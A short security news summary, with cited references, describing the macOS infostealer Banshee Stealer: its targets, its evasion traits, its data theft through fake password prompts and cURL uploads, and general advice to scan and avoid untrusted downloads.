Security researchers have recently discovered a new macOS malware known as Banshee Stealer, which poses a significant threat to Mac users [8].
Description
Banshee Stealer is a malicious software targeting Mac operating systems [3], available for purchase in underground forums for $3,000 per month. It is designed to exfiltrate sensitive data such as system information [3], browser details [2] [3] [4], and cryptocurrency wallet credentials [3] [5]. This malware targets popular browsers like Safari, Chrome [1] [2] [3] [6] [7] [9], Firefox [1] [2] [3] [6] [7] [9], Brave [2] [6] [7], Edge [1] [2] [6] [7], Vivaldi [2] [6], and Opera [2] [6], as well as over 100 browser extensions and cryptocurrency wallets. It collects device data [3], system/user passwords [3] [8], and login credentials stored in the Keychain [3], compromising cryptocurrency wallets by stealing valuable wallet information [3]. Operating on both x86_64 and ARM64 architectures [2] [7] [8] [10], Banshee Stealer is suspected to be created by Russian actors. It avoids infecting systems with Russian as the primary language and remains inactive in virtual machines. Using an AppleScript to display fake password prompts [4] [7], it collects a wide range of data including iCloud Keychain passwords, Notes [7] [9] [10], cookies [2] [3], logins [2] [3], browsing history [2], and data from browser plugins [2]. The collected data is compressed into a ZIP file, encrypted [2], encoded [2], and sent via a POST request to a specified URL using the cURL command [2]. Despite its lack of sophisticated obfuscation [2], Banshee Stealer is considered a high-quality tool for cybercriminals [6].
Conclusion
Users are advised to scan their systems with reputable antivirus software to detect and remove Banshee Stealer [3]. Caution should be exercised with downloads from unknown sources and unexpected email attachments to protect against this threat. The increasing targeting of macOS systems by cybercriminals highlights the need for enhanced security measures to safeguard Mac users in the future.
References
[1] https://www.gearrice.com/update/banshee-stealer-new-malware-targets-browsers-on-macos/
[2] https://securityaffairs.com/167138/malware/banshee-stealer-macos-malware.html
[3] https://www.bugsfighter.com/remove-banshee-stealer/
[4] https://www.heise.de/en/news/Banshee-Stealer-macOS-malware-targets-browser-data-and-crypto-wallets-9838425.html
[5] https://appleinsider.com/articles/24/08/16/banshee-stealer-malware-haunts-browser-extensions-on-macos
[6] https://forums.appleinsider.com/discussion/237321/banshee-stealer-malware-haunts-browser-extensions-on-macos
[7] https://thecybersecurity.news/general-cyber-security-news/new-banshee-stealer-targets-100-browser-extensions-on-apple-macos-systems-30515/
[8] https://securitynews.neuracyb.com/new-macos-malware-banshee-stealer-targets-over-100-browser-extensions/
[9] https://thehackernews.com/2024/08/new-banshee-stealer-targets-100-browser.html
[10] https://cybermaterial.com/new-banshee-stealer-targets-macos-browsers/
